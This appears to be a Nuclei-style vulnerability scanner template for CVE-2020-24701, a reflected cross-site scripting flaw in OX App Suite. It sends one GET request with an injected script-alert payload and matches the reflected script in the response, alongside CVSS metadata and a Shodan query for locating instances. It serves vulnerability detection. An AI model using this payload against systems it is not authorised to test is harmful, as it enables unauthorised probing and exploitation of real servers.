53 lines
1.7 KiB
YAML
53 lines
1.7 KiB
YAML
id: CVE-2020-24701
|
|
|
|
info:
|
|
name: OX Appsuite - Cross-Site Scripting
|
|
author: DhiyaneshDk
|
|
severity: medium
|
|
description: |
|
|
OX App Suite through 7.10.4 allows XSS via the app loading mechanism (the PATH_INFO to the /appsuite URI).
|
|
reference:
|
|
- https://packetstormsecurity.com/files/163527/OX-App-Suite-OX-Guard-OX-Documents-SSRF-Cross-Site-Scripting.html
|
|
- https://seclists.org/fulldisclosure/2021/Jul/33
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24701
|
|
- https://www.open-xchange.com
|
|
- https://github.com/20142995/sectool
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-24701
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00818
|
|
epss-percentile: 0.81463
|
|
cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: open-xchange
|
|
product: open-xchange_appsuite
|
|
shodan-query: html:"Appsuite"
|
|
tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Request with action all'
|
|
- '<script>alert(document.domain);</script>'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100a2cdebb20e18eaa890cfc50613c3066fe88508ab4895439e1e93c3be8538e21e0221009989389686769e0e936f56b8d0c418beb0c14d427c1d13f1eb05dbd4f49ffacc:922c64590222798bb761d5b6d8e72950 |